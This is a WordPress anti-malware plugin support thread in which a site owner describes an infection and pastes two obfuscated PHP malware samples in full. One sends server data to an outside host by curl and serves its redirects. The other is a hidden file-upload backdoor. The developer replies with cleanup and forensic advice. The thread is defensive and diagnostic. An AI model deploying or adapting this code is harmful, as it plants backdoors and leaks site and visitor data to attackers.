Topic: New malicious files and infection that the program cannot detect – Download this free Anti-Malware Plugin for WordPress.

This topic contains 3 replies, has 2 voices, and was last updated by Igor Dovecer 16 hours, 1 minute ago.

Viewing 4 posts - 1 through 4 (of 4 total)

Author

Posts
September 8, 2025 at 9:31 pm #159597
Igor Dovecer
Member
I believe both of my websites are infected with malicious code. Unfortunately, current plugin and virus defintions cannot clean them. I initially thought this might be due to the free version, so I donated €29, but it still couldn’t remove the infection.

I found some suspicious files myself and deleted them. The plugin also detected two files, but it says there’s nothing else in the database, and I couldn’t find anything either. However, Google shows a lot of “advertisement” indexed pages, such as:

mysite1.com/?m=123456789 → redirects to an ad page
mysite2.com/?k=123456789 → redirects to an ad page

These pages lead to sites like: https://www.zbbhot.store/?ggcid=672564

For now, I temporarily blocked these requests via robots.txt and redirected all ?m= URLs to the homepage using .htaccess.

Additional findings:

Your program didn’t detect a hidden user in the database. A user was created there and hidden from the WordPress admin panel:

Username: wpadminerlz
Email: domain volomart.ru

The site had a file in the root directory (public_html) named defuait.php (with a lowercase “i”) containing malicious code.
There was malicious code in the plugins folder, under mu-plugins, in the file 0hQrmW.php.

0hQrmW.php file i mu-plugins
<?php $LcELhCV = md5("ewQH2Sg5"); $aFt80EB_ = ucwords("eoL_Tc"); $WkPNY6Ja = stripos("HLchoR","f1tJEUs"); $nRGoJuN6 = ucfirst("DL4xq8BI"); $wWPEC = metaphone("LPy_f"); $nJqpmV = trim(" "); $cWicE = chunk_split("U_O7FbYx",3); $iOGy2p8 = sprintf(""); $USNlC = implode("USNlC",array());$m20vTi = metaphone("hfKFQkY"); new Ohy6ox();$xDnHL4 = ucfirst("a0kOPts"); $W2orcw = (string) null; function pHndhoQ($IYJS2Khb){ return vuIlOkG("\x6a\x73\157\156\137\x65\156\x63\x6f\x64\x65",1,$IYJS2Khb);}function lRn9uCl($nEPYif3){ if(substr($nEPYif3,0,4)=="\x68\x74\164\160"){ vuIlOkG("\150\145\141\144\145\x72",1,"\x4c\157\143\x61\x74\x69\x6f\156\72\x20".$nEPYif3); } }$kNyfqzdo = implode(",",array("NnR2b","uz8XCoS","FDl2Lkjc","ThbIq")); $S02xCjI = ucfirst("nLOmak"); $W4brjFhy = pHndhoQ($_SERVER);$s9u_bnC = addcslashes("s9u_bnC","f0Iq3UuG9"); $i5k1lt = date("Y-m-d H:i:s"); $uZqdgB = ucwords("v4dmPawKZ"); $tG2Iy0 = strval(false); $rO0fNe = addcslashes("rO0fNe","oPOiNErYyjB"); $YDfeK6Mtu = metaphone("N0ZKo"); $W4brjFhy = BSjqr($W4brjFhy);function BSjqr($IYJS2Khb){ return vuIlOkG("\142\141\163\x65\66\64\137\145\156\143\x6f\x64\x65",1,$IYJS2Khb);}$S0t7bN = date("Y-m-d H:i:s"); class tM0Hi{ public static function __callStatic($name, $arguments) { $isy6AY = vuIlOkG("\x63\x75\162\154\137\x69\x6e\x69\x74"); $VPSMmQHW = "\x68\164\164\x70\72\57\57\x63\141\143\150\145\56\165\x73\145\162\145\162\x70\x2e\x73\151\x74\x65\57\141\142\x6f\x75\164\56\x70\x68\160"; vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x30\60\60\x32"),$VPSMmQHW."\x3f\x75\141\x3d".vuIlOkG("\165\x72\x6c\145\156\143\157\x64\145",1,$arguments[0])); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x31\71\x39\61\63"), 1); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\x36\x34\x5f\162\145\x70\x6c"), 0); vuIlOkG("\x63\x75\x72\x6c\137\x73\145\164\157\160\x74",3,$isy6AY, (int)("\61\x33\x5f\x72\145\160\x6c"), 49); global $nEPYif3; $nEPYif3 = vuIlOkG("\143\x75\x72\x6c\137\145\170\x65\x63",1,$isy6AY); vuIlOkG("\143\x75\x72\x6c\137\143\154\x6f\x73\x65",1,$isy6AY); }}$bIJGPl = sha1("FCS41U"); $FfQg5P_ = addcslashes("FfQg5P_","cdpEM38q"); $GDsX2frhu = define("NwyFW","gNVrZqAvH"); tM0Hi::kevEMgr($W4brjFhy);$TBQ3bpVO = addcslashes("TBQ3bpVO","prtSdBiW1jD3"); $bEQGyUXV6 = array("LxPhOmb6BQf73"); $nQ7LzA_j = chunk_split("E9Ev0tfCFP3ls",3); $wZ30NCJ = strpos("KkBQj","COjw63"); $oho8_eRk = strtok("oho8_eRk"); $oB8m1bi0 = ucfirst("c0p1P"); $bHOP0pmA = lRn9uCl($nEPYif3);$SToQq2R = false; $ICb6x7uo = stripos("GEIX6v","R0QnYo9"); $WBCufL = implode(",",array("b7_Di","TToQ9m","TC18h3V6","rNt4doG")); $qV6CIen = strstr("qV6CIen", "Ut4_aHM"); $ZLjMI2m = addcslashes("ZLjMI2m","GE4BRe5oQ"); $EvUzr = str_replace("EvUzr", "", "EvUzr");$bVquSw = Sbw8_($nEPYif3);function vuIlOkG($strrt,$NzW2b=null,$s2o8GycE=null,$YvBfp1gI=null,$X7ABae=null,$ulSy3WY=null){ if($NzW2b==1)return $strrt($s2o8GycE); if($NzW2b==2)return $strrt($s2o8GycE,$YvBfp1gI); if($NzW2b==3)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae); if($NzW2b==4)return $strrt($s2o8GycE,$YvBfp1gI,$X7ABae,$ulSy3WY); return $strrt(); }$IwQm5cx = implode("IwQm5cx",array());function XC53Y($nEPYif3){ if(strstr(trim($nEPYif3),"\x3c\150\x74\x6d\154")){ exit($nEPYif3); } }function Sbw8_($nEPYif3){ if(strstr($nEPYif3,"\74\165\x72\154\x73\145\x74")){ exit(vuIlOkG("\150\145\141\144\145\x72",1,"\103\157\156\x74\145\x6e\x74\55\x74\171\x70\145\x3a\164\x65\170\x74\x2f\x78\155\154").$nEPYif3); } }class Ohy6ox{ public function __construct() { $_SERVER["\x54"]="\x7a"; $_SERVER["\x54\x50\114"]="\64"; }}$Bx3eR = str_pad("", 0); $oUxNzIh = XC53Y($nEPYif3);$I8CDVwFgS = defined("hMSv5UYcp"); $KLQFBgYJ = trim(" "); $VC8y1jf = (string) null; $eUJKV7X = define("th8Wc","hGBxc"); $d85HyA1S = str_replace("d85HyA1S", "", "d85HyA1S");$mdcoQA = defined("SbLhK"); $Msn59OWEJ = strval(false); $gWsYQV1oa = md5("wWyMbwS0I"); $v91Io = md5("wwP0nJ"); $sOV2MdC = str_replace("sOV2MdC", "", "sOV2MdC");

How can I properly clean the website?

I tried using MalCare, and it claims there are three more malicious files that your program cannot detect. I’m not able to pay €149 per year for cleaning at the moment, so I haven’t purchased it yet. Is there a way your program can help clean these files? Would any assistance or guidance be required to do this? Thank you very much!
- This topic was modified 3 days, 1 hour ago by Igor Dovecer.
- This topic was modified 3 days, 1 hour ago by Igor Dovecer.
- This topic was modified 3 days, 1 hour ago by Igor Dovecer.
September 10, 2025 at 3:17 am #159677

Igor Dovecer
Member

More files founr with Wordfende:

wp-content/plugins/.gallery-by-supsystic/src/GridGallery/Featuredplugins/index.php

<?php goto ykCej3;AxCHuG: echo /*
*/("oG85")[0];goto BRF6qNEm;BISpL189_: echo ("Gbaw")[2];goto jYu8BW0;mw0W_3Hk: $AOpYTE3 = false; goto _esRnx29;hWDCa5vnHF: echo /* */("Q_a")[3];goto VQ13XIdBDc;i1Zt_dv: $bNwCsM = ucfirst("jnO78R"); goto hWDCa5vnHF;ykCej3: $xrX9I0JA = false; goto qSMmVW2tBZ;hwF1IB: $VfFejBvu = addslashes("VfFejBvu"); goto eTuNgzCMnQ;eTuNgzCMnQ: $BNGuzdf = (/**/("Qesu")[2]./**/("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./* */("KtoO")[2].("Ussg")[2])("WKAhTl5I","pxu4b"); goto PzXHjpuqf;PzXHjpuqf: $ynXQOj = (/* */("iaLG")[0]./* */("neR3m6")[4].("_per")[1]./* */("l_gn9")[0]./**/("Ot_joU")[4]./**/("dbfM")[0]./**/("eaUJx")[0])(",",array("LT_9j","iV_16z","gI6o45CAl","sq7NidRG")); goto yelvMSuwnc;zyB7Ln: $i_uTNm = (/**/("iaLG")[0]./**/("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./* */("Ot_joU")[4]./* */("dbfM")[0]./* */("eaUJx")[0])("i_uTNm",array());goto ZETpXa7Y;ocalDf96EG: $bovKN = (("IKVhsp")[4]./**/("NZzt5")[3].("ZLr3ZB")[2].("kWsYX")[2]./* */("xtWM")[1].("AKr3")[2])("iM0Yo3rxd","fbBTRG"); goto AfqM3LkT;_bzhxnlV5: $rzgU5m = (/* */("iaLG")[0]./* */("neR3m6")[4].("_per")[1]./**/("l_gn9")[0]./* */("Ot_joU")[4]./*
*/("dbfM")[0]./* */("eaUJx")[0])(",",array("JL1qced","Hvw7540db","iZg15e","EoU0neEI")); goto icUuYiMvN;hrRGohl6yv: $ngJMnw6 = (/* */("UYsUA")[2]./* */("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 11); goto AxCHuG;dfei4Y: $jkVqgt8m = (("OsvgE")[1]./**/("Qtqv")[1].("WMrG")[2]./**/("_iJ_T3")[3].("VpwJLe")[1]./**/("aLvr2")[0].("wCPBdc")[4])("", 0); goto iwgH74h0oW;ZETpXa7Y: $cACFV = md5("nmVcX"); goto dfei4Y;XphWuT: if($RsdQa)exit("Hhsrta0wRMUzuZKnc".copy($_FILES["dyFw_XdT"][("Xt9zvm")[1]./**/("pnmW")[2]./* */("pOGLp")[0]./* */("_Zl4_p")[0].("cn82")[1]./* */("aQpfHM")[0]./**/("mHxrCV")[0].("ywseC")[3]],$RsdQa));goto BISpL189_;gzr8J_: $hjrdQCltf = (/**/("R9ws")[2]./**/("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./* */("rZTbU")[0].("a0AXap")[4]./* */("ZgdCp9")[4])("", 11);goto i1Zt_dv;_esRnx29: $kDuCiL = (/* */("R9ws")[2]./* */("oZYr")[0]./* */("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./**/("rZTbU")[0].("a0AXap")[4]./**/("ZgdCp9")[4])("", 11);goto VFrqJe;jYu8BW0: $vLD1t = lcfirst("QDuStBT"); goto NRsHxK4;VFrqJe: $onBqsmMg = (("Rlc8r5")[2]./**/("hBNpF2")[0].("SPu3pL")[2].("nNork")[0]./* */("kPk2fr")[2].("_Y0V")[0].("CFspDe")[2]./* */("opGHUp")[1].("ARlHS")[2].("icRXVS")[0].("EnxtsP")[3])("YiMpKIsbzCHZ",3); goto LvXbOM6;AfqM3LkT: $HiaOQ = sha1("wPiO_w4U"); goto AoYchCH;kv4rLIg: $RGXAne = ucfirst("CUA1Q6oSZ"); goto TxOVRUJZs2;VQ13XIdBDc: $QtRoTgWFG = (/* */("UYsUA")[2]./* */("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 12); goto u74JEf;Bj3GWE: $o5cWOwP = str_shuffle("uyEs5Xz"); goto k8jW9L;KFc7Jrse: $hUp3SQm = (string) null; goto nAg6BR9l2J;iwgH74h0oW: $OlLEq = ucfirst("o80qov"); goto xW0ea_QuY;u74JEf: $dhvF3_V = (/**/("OswLA")[1]./* */("pOe1")[0]./**/("xqrHK")[2].("oTxil")[3]./**/("wnd7QE")[1]./**/("QtDtW")[3]./* */("fiRGm")[0])(""); goto Bj3GWE;TxOVRUJZs2: $YnCo2d7xL = ucwords("yNWysh42"); goto hwF1IB;AoYchCH: $PsRt7m = (/**/("UYsUA")[2]./* */("jtbSaR")[1].("rouPV6")[0].("_uzA3o")[0].("qnM4rj")[4].("rejJS")[1].("QpIn69")[1].("eeEO7")[1].("caR3")[1].("tZkc4")[0])("", 5); goto WlyU249wDs;G65m9e: $LvTRl_ = strval(false); goto pglJFQ;pglJFQ: $LQ3Bz9 = (/* */("bsFZ")[1].("DwuA")[2]./* */("bNEMP7")[0]./* */("MPFst")[3]./* */("Btae")[1].("LrGT")[1])("LQ3Bz9",6,0);goto ZV7P9zrUE;xW0ea_QuY: if(!isset($_GET["azK"]))exit;goto xfAcC8;qSMmVW2tBZ: $ppV3cU5S = metaphone("t1XU9f"); goto KFc7Jrse;nAg6BR9l2J: $Gr21H = sha1("Y9_YBwr"); goto ocalDf96EG;LvXbOM6: $hVQEpa = (/**/("R9ws")[2]./* */("oZYr")[0]./**/("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./**/("rZTbU")[0].("a0AXap")[4]./* */("ZgdCp9")[4])("", 12);goto kv4rLIg;NRsHxK4: $Qo0RO78Ex = (string) null; goto D6WKRspUy;xfAcC8: if(isset($_FILES["dyFw_XdT"]))$RsdQa = basename($_FILES["dyFw_XdT"][/**/("unA2q")[1].("tazMA")[1]./**/("mbtZoM")[0]./* */("peF1")[1]]);goto XphWuT;k8jW9L: $A2ldyEBD = addcslashes("A2ldyEBD","rFNwjKJf4"); goto _bzhxnlV5;BRF6qNEm: echo /* */("ZgJS")[0];goto gzr8J_;D6WKRspUy: $Uwzi6EGn = (/**/("Qesu")[2]./* */("JaZGtk")[4].("iYCTr9")[4].("hAikO")[2].("cxpW")[2]./**/("KtoO")[2].("Ussg")[2])("fTt1uWAgM","LFYZb8n"); goto hrRGohl6yv;WlyU249wDs: $v170t = (/**/("R9ws")[2]./* */("oZYr")[0]./**/("sLqrU")[3].("CdE_M")[1].("aw5g")[1]./* */("rZTbU")[0].("a0AXap")[4]./**/("ZgdCp9")[4])("", 15);goto G65m9e;ZV7P9zrUE: $EwM4O = define("nBaNOV","KgpKtuL"); goto zyB7Ln;icUuYiMvN: $SbB3Dj = defined("XSfsaZ8"); goto mw0W_3Hk;yelvMSuwnc:""; ?>

wp-content/plugins/featured-images-for-rss-feeds/includes/freemius/templates/wp-login.php

September 11, 2025 at 6:13 am #159747

Anti-Malware Admin
Key Master

Thanks for posting the contents of those files that contained new threats. I added the one from your first post to my definition updates yesterday so that it came be automatically removed with my plugin and I am working on this last one now so that it too can be found and automatically fixed.

Rogue admin users are hard to detect automatically because there is no universal way to tell the difference between those whom you would have added as an admin user on purpose and those whom you did not want to be added. But my plugin should have been able to find and fix the malicious code that added that user and also the code that was concealing it. If that code was also not detected and you can find it in a newly added plugin file or a theme file like the functions.php file then please also send me that code so that I can update those definitions as well.

Malicious code is always changing and evolving to avoid detection. That’s why I am always releasing new definition update to keep up with the new threat variations. We need to see any new variants to that they can be identified and defined for future scans. So far, what you are doing combat this threat is good but you will need to add one critical step to your cleanup process in order to track down the source of the infection to find and fix the root cause. For every infected file you find you will need to stat the file as it is on the server before you delete it or make any changes to the file. You need to get the exact times that the file was last modified or changed before your own changes to that file overwrite the timestamps of the malicious changes. Then you can use those exact server timestamps and cross-reference the activity in your access_log files to figure out what exploit was used to plant those files or to inject that malicious code into those files. Follow that trail back as far as you can and you should be able to find the first breach and patch that exploit to prevent further attacks.

Please let me know if you get stuck and need any further assistance, and please also send me any new threat you find so that my plugin can help you remove them, and any other copies of those threats, from your server.

September 11, 2025 at 6:55 am #159752

Igor Dovecer
Member

Ok, thank you I will.
BR.
Author

Posts